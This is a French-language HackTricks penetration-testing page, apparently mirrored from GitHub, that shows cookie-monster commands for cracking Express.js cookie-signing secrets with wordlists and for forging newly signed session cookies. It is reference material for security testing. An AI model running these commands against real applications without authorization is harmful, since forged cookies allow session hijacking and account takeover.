mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-27 15:12:11 +00:00
29 lines
903 B
Markdown
29 lines
903 B
Markdown
# NodeJS Express
|
|
|
|
## Signature de Cookie
|
|
|
|
L'outil [https://github.com/DigitalInterruption/cookie-monster](https://github.com/DigitalInterruption/cookie-monster) est une utilité pour automatiser le test et la re-signature des secrets de cookie Express.js.
|
|
|
|
### Un seul cookie avec un nom spécifique
|
|
```
|
|
$ cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -n session
|
|
```
|
|
### Liste de mots personnalisée
|
|
```
|
|
$ cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -w custom.lst
|
|
```
|
|
### Tester plusieurs cookies en mode batch
|
|
```
|
|
$ cookie-monster -b -f cookies.json
|
|
```
|
|
### Tester plusieurs cookies en mode batch avec une liste de mots personnalisée
|
|
```
|
|
$ cookie-monster -b -f cookies.json -w custom.lst
|
|
```
|
|
### Encoder et signer un nouveau cookie
|
|
|
|
Si vous connaissez le secret, vous pouvez signer le cookie.
|
|
```
|
|
$ cookie-monster -e -f new_cookie.json -k secret
|
|
```
|
|
|